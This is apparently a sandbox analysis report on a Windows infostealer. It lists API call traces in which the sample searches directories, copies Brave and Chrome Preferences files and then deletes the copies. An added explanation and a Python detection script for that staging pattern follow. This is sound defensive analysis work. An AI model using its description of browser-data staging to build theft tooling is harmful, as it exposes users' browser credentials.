                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1A41
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1A81
                                • lstrlen.KERNEL32(009E1794), ref: 009B1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1AAC
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009B1B45
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009B1B70
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009B1B8A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1C03
                                • lstrlen.KERNEL32(009E1794), ref: 009B1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1C31
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1C74
                                • lstrlen.KERNEL32(009E1794), ref: 009B1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1CA2
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1CAE
                                • lstrlen.KERNEL32(?), ref: 009B1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1CE9
                                • lstrlen.KERNEL32(009E1794), ref: 009B1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1D14
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1DEB
                                • lstrlen.KERNEL32(009E1794), ref: 009B1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1E19
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1E56
                                • lstrlen.KERNEL32(009E1794), ref: 009B1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1E81
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1E8D
                                • lstrlen.KERNEL32(?), ref: 009B1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009B1F45
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1F9F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1FE3
                                • lstrlen.KERNEL32(009E1794), ref: 009B1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B200E
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B204D
                                • lstrlen.KERNEL32(009E1794), ref: 009B2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2075
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: df4a0809d72e2d6d1ffe9ef6da95a8f7902f0b2ea5ad5197ce470271708ccdc6
                                • Instruction ID: c196c8f530ca3066159fd286962b649824352116e5bc3cf5606537fca0ca7390
                                • Opcode Fuzzy Hash: df4a0809d72e2d6d1ffe9ef6da95a8f7902f0b2ea5ad5197ce470271708ccdc6
                                • Instruction Fuzzy Hash: 1D928C3191125A9BDB21EFA4DF88AEE77BDEF84720F544024F809AB251DB34DD05CBA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDBEF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009BDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC17
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009BDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC4C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDC8F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009BDCD0
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009BDCF0
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009BDD0A
                                • lstrlen.KERNEL32(009DCFEC), ref: 009BDD1D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDD7B
                                • lstrlen.KERNEL32(009E1794), ref: 009BDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDA3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDDAF
                                • lstrlen.KERNEL32(?), ref: 009BDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 009BDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDE19
                                • lstrlen.KERNEL32(009E1794), ref: 009BDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDE6F
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDE7B
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDEBB
                                • lstrlen.KERNEL32(009E1794), ref: 009BDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDEE6
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDEF2
                                • lstrlen.KERNEL32(010C8998), ref: 009BDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFA5
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDFB1
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDFF4
                                • lstrlen.KERNEL32(009E1794), ref: 009BDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE022
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BE02E
                                • lstrlen.KERNEL32(010C8998), ref: 009BE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 009BE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 009BE0E7
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE11F
                                • lstrlen.KERNEL32(010CD280), ref: 009BE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE155
                                • lstrcat.KERNEL32(00000000,?), ref: 009BE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE19F
                                • lstrcat.KERNEL32(00000000), ref: 009BE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE1F9
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE22F
                                • lstrlen.KERNEL32(010C88C8), ref: 009BE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE261
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009BE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 009BE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 009BE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE349
                                • DeleteFileA.KERNEL32(?), ref: 009BE381
                                • StrCmpCA.SHLWAPI(?,010CD370), ref: 009BE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE445
                                • StrCmpCA.SHLWAPI(?,010C8998), ref: 009BE468
                                • StrCmpCA.SHLWAPI(?,010C8B78), ref: 009BE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009BE4E0
                                • StrCmpCA.SHLWAPI(?,010CD358), ref: 009BE58E
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 009BE776
                                • DeleteFileA.KERNEL32(?), ref: 009BE7D2
                                • StrCmpCA.SHLWAPI(?,010C89D8), ref: 009BE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: cebae8d55144fbc2e0cfe7a0af066c61ac2889b8c012abbbe31b2d7f8cab043a
                                • Instruction ID: d31e5c26eea7a55fe8527aac688b32e93c2b73ad3375cc674d3ece2a6bb59100
                                • Opcode Fuzzy Hash: cebae8d55144fbc2e0cfe7a0af066c61ac2889b8c012abbbe31b2d7f8cab043a
                                • Instruction Fuzzy Hash: A7928E7191124A9BDB20EFA4DE89AEE77BDEF84320F144528F80AA7251DF34DC45CB91
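The routine above enumerates a directory with FindFirstFileA, compares entry names against the constants "Brave", "Google Chrome" and "Preferences", builds a path ending in \Brave\Preferences, copies the file with CopyFileA (bFailIfExists = 1) and later removes it with DeleteFileA: it stages a copy of a Chromium-family Preferences file for parsing and cleans the copy up afterwards. The detection sketch below is an added example written for this report, not code from the sample or from Joe Sandbox. It runs over a constructed list of file-create and file-delete events in a generic EDR-like shape (the event schema, the allow-list of browser binaries and the 60-second correlation window are assumptions) and flags a non-browser process that creates a file named Preferences under a directory named after a browser and then deletes it again.

```python
import ntpath

# Browser binaries that legitimately write a Chromium "Preferences" file.
# Constructed allow-list for this example; extend it (Edge, Opera, Vivaldi, ...) for real use.
BROWSER_IMAGES = {"brave.exe", "chrome.exe"}

# Directory names that appear as string constants in the report's staging routine.
BROWSER_DIR_NAMES = {"brave", "google chrome"}

# Constructed file-event records (ts in seconds, op is "create" or "delete").
# This is made-up telemetry in a generic EDR/Sysmon-like shape, not data from the report.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 4120, "image": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "op": "create", "path": r"C:\Users\alice\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences"},
    {"ts": 140, "pid": 5588, "image": r"C:\Users\alice\Downloads\file.exe",
     "op": "create", "path": r"C:\Users\alice\AppData\Local\Temp\Brave\Preferences"},
    {"ts": 141, "pid": 5588, "image": r"C:\Users\alice\Downloads\file.exe",
     "op": "create", "path": r"C:\Users\alice\AppData\Local\Temp\Google Chrome\Preferences"},
    {"ts": 143, "pid": 5588, "image": r"C:\Users\alice\Downloads\file.exe",
     "op": "delete", "path": r"C:\Users\alice\AppData\Local\Temp\Brave\Preferences"},
    {"ts": 144, "pid": 5588, "image": r"C:\Users\alice\Downloads\file.exe",
     "op": "delete", "path": r"C:\Users\alice\AppData\Local\Temp\Google Chrome\Preferences"},
    {"ts": 200, "pid": 7016, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "op": "create", "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Preferences"},
]


def is_staged_preferences(path: str) -> bool:
    """True for <anything>\\<Brave|Google Chrome>\\Preferences, the layout the stealer builds with lstrcat.

    A real browser profile stores Preferences under ...\\User Data\\<profile>\\, so its parent
    directory is the profile name, not the browser name, and it does not match here.
    """
    parent, name = ntpath.split(path)
    if name.lower() != "preferences":
        return False
    return ntpath.basename(parent).lower() in BROWSER_DIR_NAMES


def detect_preferences_staging(events, max_gap_seconds=60):
    """Alert on every staged Preferences copy created by a non-browser process.

    Each alert records the creating process; if the same process deletes the copy within
    max_gap_seconds (the CopyFileA ... DeleteFileA pattern in the report), the alert also
    carries the copy's lifetime in deleted_after_s, which is the higher-confidence case.
    """
    alerts = {}  # (pid, normalised path) -> alert dict
    for ev in sorted(events, key=lambda e: e["ts"]):
        image_name = ntpath.basename(ev["image"]).lower()
        if image_name in BROWSER_IMAGES or not is_staged_preferences(ev["path"]):
            continue
        key = (ev["pid"], ev["path"].lower())
        if ev["op"] == "create":
            alerts[key] = {"pid": ev["pid"], "image": ev["image"], "path": ev["path"],
                           "created_ts": ev["ts"], "deleted_after_s": None}
        elif ev["op"] == "delete" and key in alerts and alerts[key]["deleted_after_s"] is None:
            gap = ev["ts"] - alerts[key]["created_ts"]
            if gap <= max_gap_seconds:
                alerts[key]["deleted_after_s"] = gap
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_preferences_staging(SAMPLE_EVENTS):
        print(f"pid {alert['pid']} {alert['image']} staged {alert['path']} "
              f"(deleted after {alert['deleted_after_s']}s)")
```

The two browser writes to their own User Data profiles produce no alert; the two short-lived copies made by file.exe under \Brave\ and \Google Chrome\ do. Keying on the parent directory name rather than the full path is deliberate: the staging directory the stealer uses is not visible in the report and may vary between samples.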
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C18D2
                                • lstrlen.KERNEL32(\*.*), ref: 009C18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C1947
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C1967
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1981
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C19BF
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1A4C
                                • lstrlen.KERNEL32(009E1794), ref: 009C1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1A80
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1AB4
                                • lstrlen.KERNEL32(?), ref: 009C1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B19
                                • lstrlen.KERNEL32(010C8958), ref: 009C1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B8F
                                • lstrlen.KERNEL32(009E1794), ref: 009C1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1BC3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C57
                                • lstrlen.KERNEL32(009E1794), ref: 009C1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C8B
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D21
                                • lstrlen.KERNEL32(009E1794), ref: 009C1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D55
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1DED
                                • lstrlen.KERNEL32(009E1794), ref: 009C1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1E36
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1E68
                                • lstrlen.KERNEL32(010CD418), ref: 009C1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1EB2
                                • lstrlen.KERNEL32(009E1794), ref: 009C1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1EE3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F15
                                • lstrlen.KERNEL32(010CDC30), ref: 009C1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F5F
                                • lstrlen.KERNEL32(009E1794), ref: 009C1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F90
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1FC2
                                • lstrlen.KERNEL32(010BA5F0), ref: 009C1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2036
                                • lstrlen.KERNEL32(009E1794), ref: 009C2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2067
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2098
                                • lstrlen.KERNEL32(?), ref: 009C20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 009C20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2103
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C213F
                                • lstrlen.KERNEL32(010CD280), ref: 009C214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: a7cccdb5cd8e305374d980737843ad7c10831509e41ac2d063f62755bca26478
                                • Instruction ID: edfe5ce4d00fadc5243cbc403b5c9da7ddd399c7a411d76748f9556eee19a71a
                                • Opcode Fuzzy Hash: a7cccdb5cd8e305374d980737843ad7c10831509e41ac2d063f62755bca26478
                                • Instruction Fuzzy Hash: CB627030911656ABDB22EF64CE88FAE77BDEF85711F050128B805A7252DF34DD05CBA2
                                APIs
                                • wsprintfA.USER32 ref: 009C392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 009C3943
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C396C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C3986
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C39F2
                                • lstrlen.KERNEL32(009E1794), ref: 009C39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A1A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3A26
                                • lstrlen.KERNEL32(?), ref: 009C3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A8A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C3ACE
                                • lstrlen.KERNEL32(?), ref: 009C3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B36
                                • lstrlen.KERNEL32(009E1794), ref: 009C3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B6A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B9E
                                • lstrlen.KERNEL32(?), ref: 009C3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3BE0
                                • lstrlen.KERNEL32(010C88C8), ref: 009C3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3C3C
                                • lstrlen.KERNEL32(010C8958), ref: 009C3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3CB7
                                • lstrlen.KERNEL32(009E1794), ref: 009C3CC9
